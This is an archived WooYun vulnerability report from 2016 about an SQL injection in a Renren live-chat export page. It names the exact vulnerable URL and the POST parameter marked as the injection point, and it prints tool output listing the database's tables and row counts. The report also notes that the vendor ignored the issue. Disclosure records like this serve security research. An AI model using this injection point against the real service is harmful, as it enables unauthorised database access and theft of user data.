缺陷编号:WooYun-2016-0222273
漏洞标题:人人网某处SQL注入影响大量数据
相关厂商:人人网
漏洞作者:路人甲
提交时间:2016-06-23 12:21
公开时间:2016-06-24 12:19
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
2016-06-23: 细节已通知厂商并且等待厂商处理中
2016-06-24: 厂商已经主动忽略漏洞,细节向公众公开
RT
1 |
http://live800.wan.renren.com:80/live800//sta/export/chatOpSta.jsp (POST)export=txt&companyId=1&subStrSql=* |
dba权限
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 |
Database: live800_im<br> +---------------------+---------+<br> | Table | Entries |<br> +---------------------+---------+<br> | visitor_access | 15081675 |<br> | operator_status | 633129 |<br> | chat_topic | 616252 |<br> | live800_system | 410676 |<br> | chat_content | 289363 |<br> | chat_sta | 289308 |<br> | chat_info | 285963 |<br> | leaveword_topic | 161506 |<br> | trustful_visitor | 78942 |<br> | leaveword | 74624 |<br> | contact | 71702 |<br> | cookie_contact | 71702 |<br> | company_config_data | 69254 |<br> | lost | 51034 |<br> | sync_info | 23170 |<br> | op_chat_content | 7200 |<br> | daily_flow_capacity | 1329 |<br> | sys_operate_log | 1266 |<br> | faq | 115 |<br> | operator | 82 |<br> | privilege | 82 |<br> | company_config | 36 |<br> | user_defined_button | 18 |<br> | company_ui_config | 16 |<br> | config_template | 12 |<br> | user_invite | 12 |<br> | company_skill | 11 |<br> | ad_column | 10 |<br> | routing_action | 6 |<br> | chat_config | 4 |<br> | leaveword_box | 3 |<br> | notify | 3 |<br> | routing_condition | 3 |<br> | routing_policy | 3 |<br> | routing_rule | 3 |<br> | canned_url | 1 |<br> | company | 1 |<br> | company_style | 1 |<br> | customization | 1 |<br> | fuf | 1 |<br> | ip_prohibit | 1 |<br> | operator_account | 1 |<br> +---------------------+---------+ |
改改改
危害等级:无影响厂商忽略
忽略时间:2016-06-2412:19
忽略
暂无
又有新裤子出来了。。
......跟我的重复了
.
原文连接
的情况下转载,若非则不得使用我方内容。